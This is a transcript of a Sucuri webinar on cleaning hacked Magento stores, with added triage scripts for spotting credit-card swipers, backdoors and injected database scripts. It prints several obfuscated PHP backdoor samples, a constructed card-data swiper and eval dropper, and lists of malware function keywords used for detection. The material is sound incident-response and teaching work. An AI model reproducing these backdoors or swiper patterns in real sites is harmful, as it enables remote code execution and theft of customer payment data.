Sucuri Webinar: How to Clean a Hacked Magento Website

Page 1

How to CLEAN a Hacked Magento Site WEBINAR

Cesar Anjos | @sucurisecurity #AskSucuri

Page 3

VALENTIN VESA | Brand Evangelist / Moderator | @adspedia

Page 4

HOUSEKEEPING ITEMS

● We want to hear from you

● Question tab in GoToWebinar

● Tweet @SucuriSecurity using #AskSucuri

● Questions will be answered at the end

● All questions will receive a response

● Video and slides coming in a few days

● Please share this content with other website owners

Page 5

CESAR ANJOS | Security Analyst / Incident Responder at Sucuri

Page 6

Porto, Portugal

Page 7

What to expect from this webinar

● Understanding whether there may have been a compromise

● How to assess whether there are any credit card stealers on the site

● How to look for the most common types of credit card stealers

● How to get rid of most infections without much technical knowledge

Page 8

sucuri.net/guides

Step-by-step walkthroughs

for popular CMS platforms

and website security issues.

Get Instructions

Page 9

Data stealer malware

● The biggest enemy of Magento installations.

● Confirmation of a breach may require cooperation with the authorities.

● It is advisable to alert customers, as they may not (yet) have been affected by it.

Page 10

Overview

● Looking for signs of compromise

● Finding the malware

● Clean the infection and wipe its remains

● What Now?

Page 11

Understanding data breach implications

If any compromise happens, be sure to make a full backup of:

• Server log files (web server, FTP/SSH and database logs)

• All files pertaining to the site

• The database

Take the backup before changing anything: cleanup destroys the evidence an investigation needs.

Having a data breach on your website affects the website, its owner, and its users. The website owner has the responsibility to investigate any suspicion of compromise and keep a record of all findings.

Any data stolen by the attackers is usually used within the first 12 hours after the theft. In some cases it may also be kept for later use, or sold.

Page 12

LOOKING FOR SIGNS OF COMPROMISE

What are some of the indicators that your website has been compromised?

Page 13

Indicators of compromise:

● Customers reporting strange behavior on your site

● Checkout process acting oddly

● Customers complaining that their data was stolen after buying on your website

● External scanners detecting some malware or blacklist

● Unauthorized accesses or changes

● You just spot something strange, such as a defacement

Page 14

Dialog with customers

What they report:

● Data being stolen

● Redirects

● Pop-ups

● Alert messages

What you need to verify:

● When exactly did the visit and the theft occur

● What browser/antivirus/OS/platform they used

● Were any purchases made on other websites (the card may have been stolen elsewhere)

● A detailed explanation of what happened

Page 15

Abnormal checkout behavior

● Redirects

● Pop-ups

● Unexpected scripts or other files being loaded on the checkout page

● Payments going to someone else's account

● Checkout simply does not work

Ensuring that the entire checkout flow keeps its integrity is very important.

Page 17

Using a Virtual Credit Card

● Virtual credit cards have a spending limit and usually a very short expiration date

● Most banks across the world offer such a service

● Low risk if stolen

● Can use a pre-paid or debit system

● No direct relation between the card and your identity

● May have a per-card cost, usually around $1

Page 18

Scan your site

● Sucuri SiteCheck - sitecheck.sucuri.net

● Hypernode's MageReport - magereport.com

● Magescan - magescan.com

● VirusTotal (Google) - virustotal.com

Page 19

Sitecheck

● Checks for blacklists

● Scans for multiple kinds of malware within the site

● Provides immediate insight on what was detected

Page 20

MageReport

● Checks for missing patches or vulnerable elements

● Checks for certain specific malware types that affect Magento environments

Page 21

VirusTotal

Checks the site against the blacklists of multiple providers

Page 22

Blacklist

Google's blacklist is the most damaging blacklist.

Blacklisted websites lose about 95% of their traffic.

Page 23

Modus Operandi of credit card swipers

Sends the data to an external domain:

● Typically JavaScript

● Can work based on the current page, e.g. "firecheckout"

● Can be present in PHP files that directly handle checkouts

● Gets cached easily by Magento

Stores the data in your domain's files:

● Can only be inside PHP files

● Typically stored inside /media

● Usually disguises itself as an image or a file with no extension

● The file size grows over 3 MB extremely fast

Page 24

FINDING THE MALWARE

How can the malware be located?

Page 25

Focused analysis

● Needle in a haystack

● Start by focusing on what you already know

● Attempting to establish a timeframe is important in data theft cases

● Look for what else may be present

Page 26

Check modified files

● Using the diff command to compare with a clean version

● Checking for files modified within the last few days if you suspect the compromise was recent

● Try Amasty's free Modified Core Files report tool

https://blog.amasty.com/freebie-magento-modified-core-files-report-by-amasty

Page 27

Diff command

● $ mkdir magento-2.1.3 && cd magento-2.1.3

● $ wget https://github.com/magento/magento2/archive/2.1.3.tar.gz

● $ tar -zxvf 2.1.3.tar.gz   (the archive extracts to magento2-2.1.3/)

● $ diff -r magento2-2.1.3 /path/to/public_html

● Has to be run over SSH (shell access to the server).

● Download the exact version the site runs (Magento 2: php bin/magento --version; Magento 1: the version in app/Mage.php), otherwise every core file will show as different.

● Useful to get a direct comparison of what is different between two sets of folders.

● If the comparison is done against a freshly downloaded installation, any modules installed by the owner (and the site's own var/, media/ and generated files) have to be compared separately.

● Can also be used to compare the current live version with a backup to get a direct result of what is different.

Page 28

Files modified recently

● $ find ./ -type f -mtime -15   Tells what files were modified in the last 15 days

● $ find ./ -type f -mtime -30   Tells what files were modified in the last 30 days

● This gives a clear indication of what files have been modified in the timeframe specified.

● If you have a clear date of when the compromise might have happened, this is a great starting point.

● Attackers can reset timestamps (touch), so an old mtime does not prove a file is clean; the diff against a clean copy does.

Page 29

Pro Tip - Check your modified files

● Look for files bigger than 3 MB, as they may store stolen customer data

$ find . -type f -size +3M

● Use Sucuri's Backup service as an integrity record keeper
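The find and diff steps from the last three slides, combined into one script. This is an added example and not part of the Sucuri webinar; it assumes a Linux host with GNU find, diff and grep, a Magento 1 style layout (media/, var/cache/) and the 3 MB threshold the slide uses. The "site" it runs against is constructed inside the script, not real store data.

```shell
#!/bin/sh
# Added example, not from the Sucuri deck: file-system triage for a Magento
# document root, combining the deck's find/diff steps. Assumes GNU find,
# diff and grep (for -size +3M and --exclude); paths are illustrative.

# Files changed in the last DAYS days. Runtime cache/session directories
# churn constantly and would drown the result, so they are skipped.
recent_files() {            # usage: recent_files ROOT DAYS
    find "$1" -type f -mtime "-$2" ! -path '*/var/cache/*' ! -path '*/var/session/*'
}

# Files larger than SIZE (e.g. 3M). A swiper that logs card data locally
# makes its drop file grow quickly.
large_files() {             # usage: large_files ROOT SIZE
    find "$1" -type f -size "+$2"
}

# Files under media/ that carry a PHP open tag although they have no
# extension or an image extension: the disguise the deck describes.
fake_media_files() {        # usage: fake_media_files ROOT
    find "$1/media" -type f \
        \( -name '*.jpg' -o -name '*.png' -o -name '*.gif' -o ! -name '*.*' \) \
        -exec grep -laF '<?php' {} +
}

# Compare the live tree with a pristine copy of the same version. Files that
# exist only in the pristine copy are normal (deleted samples, tests); changed
# files and files that exist only on the live side are what matter.
diff_against_pristine() {   # usage: diff_against_pristine PRISTINE LIVE
    diff -rq --exclude=var --exclude=media --exclude=generated "$1" "$2" \
        | grep -Fv "Only in $1"
}

# Constructed demo tree (not real site data): a "pristine" core with one
# controller, and a "live" copy with the deck's three tell-tales injected.
make_demo_site() {
    tmp=$(mktemp -d)
    ctl=app/code/core/Mage/Checkout/controllers/OnepageController.php
    mkdir -p "$tmp/pristine/$(dirname "$ctl")"
    printf '<?php\nclass Mage_Checkout_OnepageController {}\n' > "$tmp/pristine/$ctl"
    touch -t 201701010000 "$tmp/pristine/$ctl"
    cp -Rp "$tmp/pristine" "$tmp/live"
    mkdir -p "$tmp/live/media/catalog" "$tmp/live/var/cache"
    # legitimate product image: JPEG magic bytes, untouched for years
    printf '\377\330\377\340' > "$tmp/live/media/catalog/product.jpg"
    touch -t 201701010000 "$tmp/live/media/catalog/product.jpg"
    # 1) checkout controller modified to append POST data to a fake image
    printf '%s\n' "file_put_contents('media/catalog/cache.jpg', json_encode(\$_POST), FILE_APPEND);" >> "$tmp/live/$ctl"
    # 2) the drop file: PHP marker, then 4 MB of filler standing in for stolen data
    { printf '<?php /* drop */ ?>'; dd if=/dev/zero bs=1048576 count=4 2>/dev/null; } > "$tmp/live/media/catalog/cache.jpg"
    # 3) extensionless dropper sitting in media/
    printf '<?php eval($_POST["c"]);\n' > "$tmp/live/media/logo"
    echo "$tmp"
}

demo() {
    site=$(make_demo_site)
    echo "== modified in the last 15 days"; recent_files "$site/live" 15
    echo "== larger than 3M";               large_files "$site/live" 3M
    echo "== PHP hiding under media/";      fake_media_files "$site/live"
    echo "== differs from pristine core";   diff_against_pristine "$site/pristine" "$site/live"
    rm -rf "$site"
}

# "sh triage.sh demo" runs the walkthrough; source the file to use the
# functions against a real document root and a downloaded clean copy.
if [ "${1:-}" = demo ]; then demo; fi
```

On a real site, run the four functions against the document root (and the unpacked clean download for diff_against_pristine), and treat the union of the lists as the set of files to open, not as a verdict: a recently modified module update is normal, a PHP tag inside media/ is not.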

Page 30

Audit users list

● Any unfamiliar users must be removed

● Check backend admin users (the admin_user table) and any API or integration users, not only customer accounts

Page 31

Functions/code most used by malware that steals credit card info/logins

Search for common swiper functions/code

● <script (with inclusion of an external file)

● http.open

● http.send

● this[“eval”]

● fwrite

● file_put_contents

● FILE_APPEND

● mail(

● curl (curl_init / curl_exec)

Page 32

Example swipers found in app/code/core/Mage/Checkout/controllers/OnepageController.php, the Magento 1 one-page checkout controller, which handles the checkout steps including the payment data

Page 33

Search for common backdoor functions/code

● assert

● stripslashes

● preg_replace (with the /e modifier)

● move_uploaded_file

● strrev

● file_get_contents

● encodeURI

● strtr

● base64

● str_rot13

● gzuncompress

● gzinflate

● curl_exec

● exec

● create_function

● wget

● system

Page 34

Common backdoors

Samples as captured on the slide (padded with junk comments to defeat signature matching; the last one is truncated):

<?php if/*pzC*/(isset($_REQUEST['gTOM']))/*A*/{/*h*/$1=/*B*/"assert";$G=$1/*HJ*/(/*jyM*/$_REQUEST['gTOM'])/*tC*/;exit;}?>

<?php /*k*/if(!function_exists('_BmHCiKnI')){$GLOBALS['_CbuEzptH_']=Array('' .'preg_repla' .'ce'); @function _BmHCiKnI($i){$a=Array('jQzN','/(.*)/e','jQzN','');return $a[$i];}if(@isset($_REQUEST[_BmHCiKnI(0)])){ @$GLOBALS['_CbuEzptH_'][0](_BmHCiKnI(1),$_REQUEST[_BmHCiKnI(2)],_BmHCiKnI(3));exit;}}

<?php if(isset($_COOKIE["lI"])){$_COOKIE["ud"]($_COOKIE["lI"]);exit;}

<?php function echo2($token){ @eval($token);}echo2($_POST[libsodium]);?>

if(md5($_COOKIE['key']) == $key) { eval (base64_decode($_POST["code"])); }

${"QK"}=@$ {"_POST"/*cdtxd6*/};@((($QK{ "0"}/*vgx94*/<>@$QK{"1"})))?@ $QK{"2" }(( (/*nkp*/@${"QK"}{"3"}))):${'QK'

Page 35

Check your site's header and footer areas

Footer and header areas are a prime target for attackers because they load throughout the site.

Page 38

Check with an outside expert

Consult directly with security experts when in doubt, or whenever you need assistance.

Page 39

CLEAN THE INFECTION AND WIPE ITS REMAINS

How to effectively get rid of Magento's most common infections

Page 40

Before you attempt to fix anything

● Ensure that you have performed a full backup of files and database

● Store them in a safe location

● Preferably import your website on a temporary environment

● Place your website in maintenance mode, if required

● Contact authorities if you are a big store and there was any data theft

Page 41

Fix hacked files

● Search the files for any malware indicators you may have obtained

● Inspect the modified files discovered by the investigation

● Restore those files to a known-good state from official sources (a fresh download of the same version, or a verified clean backup)

● Googling parts of suspicious code may help with cleanup

● Remove any suspicious code

● Test the site to ensure everything still works as it should

Page 42

Suspicious code

● Sometimes code may look suspicious because it is encoded, but many commercial modules ship their code encoded to prevent it from being stolen.

● Such modules must be individually compared with their original version.

● Some online tools that help decode the remaining code:

● ddecode.com/phpdecoder

● unphp.net/

● jsbeautifier.org/

● These tools send the code to a third party, so never paste anything that contains credentials, keys or customer data.

Page 43

Using ddecode.com

Page 44

Using unphp.net

Page 45

Database infections

● Ensure that you have a full backup before any operation.

● They can usually be cleaned directly through the backend of the site (in Magento 1: System > Configuration > Design > HTML Head > Miscellaneous Scripts, and Footer > Miscellaneous HTML).

● Attackers usually infect the core_config_data table, more specifically the records with the paths design/head/includes and design/footer/absolute_footer. Check every scope (default, websites, stores), since an injection on a single store view is easy to miss in the backend.
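A way to check the core_config_data rows without touching the live database: scan the mysqldump you took as the first step. This is an added example and not part of the webinar; it assumes a standard mysqldump (one extended INSERT per table, values in single quotes, embedded double quotes escaped as \"), and the injection patterns are mine. The dump it scans is constructed inside the script.

```shell
#!/bin/sh
# Added example, not from the Sucuri deck: find injected HTML/JS in
# core_config_data by scanning a mysqldump of the store. Assumes GNU grep
# and a standard mysqldump layout; the regexes are illustrative.

# One core_config_data row per line: mysqldump writes the whole table as a
# single INSERT ... VALUES (...),(...),(...); so split on the row separator.
config_rows() {             # usage: config_rows DUMP
    grep -E '^INSERT INTO `core_config_data`' "$1" \
        | awk '{ gsub(/\),\(/, ")\n("); print }'
}

# What an injected value usually looks like: a script from another host, or
# the obfuscation helpers used to hide one.
injection_patterns() {
cat <<'EOF'
<script[^>]*src=\\?["']?https?://
eval\(
atob\(
unescape\(
String\.fromCharCode\(
document\.write\(
EOF
}

# Rows under design/* (head includes, footer, copyright ...) whose value hits
# one of the patterns. All scopes (default, websites, stores) are included.
suspicious_config() {       # usage: suspicious_config DUMP
    pat=$(mktemp); injection_patterns > "$pat"; status=0
    config_rows "$1" | grep "'design/" | grep -E -f "$pat" || status=$?
    rm -f "$pat"
    return "$status"
}

# Constructed mysqldump excerpt (not a real store): a clean stylesheet include,
# an external script in the footer, and an eval(atob()) payload on store 1.
make_demo_dump() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
-- constructed dump excerpt
DROP TABLE IF EXISTS `core_config_data`;
INSERT INTO `core_config_data` VALUES (3,'default',0,'web/unsecure/base_url','http://shop.example/'),(12,'default',0,'design/head/includes','<link rel=\"stylesheet\" type=\"text/css\" href=\"/skin/frontend/base/default/css/custom.css\" />'),(57,'default',0,'design/footer/absolute_footer','<script type=\"text/javascript\" src=\"https://stats.example/js/jquery.min.js\"></script>'),(58,'stores',1,'design/head/includes','<script>eval(atob(\"ZG9jdW1lbnQud3JpdGUoMSk=\"))</script>');
EOF
    echo "$f"
}

demo() {
    dump=$(make_demo_dump)
    echo "== design/* rows that look injected"; suspicious_config "$dump"
    rm -f "$dump"
}
if [ "${1:-}" = demo ]; then demo; fi
```

Each flagged row prints with its config_id, scope and path, so it can be cleared in the backend or with a targeted statement such as UPDATE core_config_data SET value = '' WHERE config_id = 57; followed by a cache flush. Legitimate third-party scripts (analytics, chat widgets) will be flagged as well; compare every hit against what the store owner actually installed before removing it.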

Page 46

Tidying up

● Reset user passwords (admin, customer and database users)

● Change cPanel or FTP/SFTP credentials, and any API keys

● Review who has access to what

● Clear caches (very important step: a swiper cached in block HTML or the full-page cache survives the file cleanup; Magento 1: empty var/cache and var/full_page_cache if present; Magento 2: php bin/magento cache:flush)

● Fix any malware warnings or blacklists (request a review once the site is clean)

Page 47

ALL CLEAN, WHAT NOW?

Page 48

Steps to take

● Ensure all security patches are applied

● Have a backup system in place

● Scan computers that access the backend

● Add extra control/protection mechanisms to the site

● Take every precaution to ensure that all vulnerable areas are secure or patched, such as /downloader (the Magento 1 Connect Manager; remove it or restrict it by IP if it is not needed)

● Change the backend admin area URL

● Make regular purchases on your own site to ensure its integrity (using virtual credit cards)

Page 49

Useful extensions/services to have in place

● Sucuri Firewall

● MageFirewall Security

● Nexcess Sentry Two-Factor Authentication

● miniOrange Two-Factor Authentication

● Admin Actions Log extension (if there are various admin users)

Page 50

You have to assume the attackers will be back

● Keep all accesses filtered and monitored

● Keep up with security updates

● Prepare an incident response plan with your team - https://github.com/talesh/response

● Ensure that the backup system works when needed; test it by restoring on a separate location and verifying that it works

Page 51

Website Firewall

Page 52

Tweet us any time with your questions @SucuriSecurity using #AskSucuri

THANK YOU

Time for Questions